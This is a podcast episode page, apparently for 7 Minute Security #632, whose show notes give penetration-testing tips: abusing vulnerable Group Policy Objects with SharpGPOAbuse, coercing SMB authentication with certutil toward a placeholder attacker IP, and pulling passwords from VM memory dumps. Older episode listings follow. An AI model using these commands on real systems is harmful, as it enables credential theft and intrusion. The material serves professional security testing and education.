7MS #632: Tales of Pentest Pwnage – Part 59
7 Minute Security12 Heinä 2024

7MS #632: Tales of Pentest Pwnage – Part 59

Today’s tale of pentest pwnage includes some fun stuff, including:

    • SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder.
    • I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
    • DonPAPI got an upgrade recently with a focus on evasion!
    • When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps.
    • Can’t RDP into a victim system that you’re PSRemote’d into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`

And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

Jaksot(681)

7MS #80: OSWP-Part 1

7MS #80: OSWP-Part 1

This episode kicks off a multi-part series all about the OSWP (Offensive Security Wireless Professional) certification.

28 Heinä 20157min

7MS #79.5: UPDATE(!) on My Love-Hate Relationship with Nessus

7MS #79.5: UPDATE(!) on My Love-Hate Relationship with Nessus

In episode #79 I shared some gripes about Nessus. Those gripes were quickly answered by Tenable staff/support so I wanted to pass relevant updates on to you!

27 Heinä 20156min

7MS #79: My Love-Hate Relationship with Nessus

7MS #79: My Love-Hate Relationship with Nessus

In this episode I talk about one of my favorite vulnerability scanners, Nessus, and why I want to simultaneously hug it and punch it in the neck.

23 Heinä 20157min

7MS #78: It's All About Segmentation

7MS #78: It's All About Segmentation

In this episode I advocate for proper network segmentation, as doing it (well and right!) can seriously reduce your risks!

21 Heinä 20157min

7MS #77: OFFTOPIC-Rickrolling Your Coworkers for Fun and Profit

7MS #77: OFFTOPIC-Rickrolling Your Coworkers for Fun and Profit

This week i used my Wifi Pineapple to scare and amuse my coworkers and lure them into a Rickroll trap. All the gory details in today's episode!

16 Heinä 20157min

7MS #76: Lessons Learned from LastPass

7MS #76: Lessons Learned from LastPass

I know this is a bit late, but I wanted to talk a little about the LastPass breach and why I'll still remain a customer.

14 Heinä 20157min

7MS #75: OFFTOPIC-My Son's Piano Recital

7MS #75: OFFTOPIC-My Son's Piano Recital

I wanted to share (what I think is) an amusing anecdote about my son's first piano recital, which was topped off by a kid playing the song "Lucky." Many LOLs commenced for me.

9 Heinä 20159min

7MS #74: How to Become a More Organized Information Security Professional

7MS #74: How to Become a More Organized Information Security Professional

In this episode I share some strategies and apps that may help you stay more organized as you go about your infosec work!

8 Heinä 20158min

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
ootsa-kuullut-tasta-2
aikalisa
politiikan-puskaradio
otetaan-yhdet
et-sa-noin-voi-sanoo-esittaa
rss-vaalirankkurit-podcast
rikosmyytit
aihe
rss-mina-ukkola
rss-raha-talous-ja-politiikka
rss-hyvaa-huomenta-bryssel
rss-kyselytunti
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
politbyroo
the-ulkopolitist
rss-suoraan-asiaan
rss-kaikki-paskaksi-ystavat
rss-kaikki-uusiksi
rss-tyolinjalla-pekka-sauri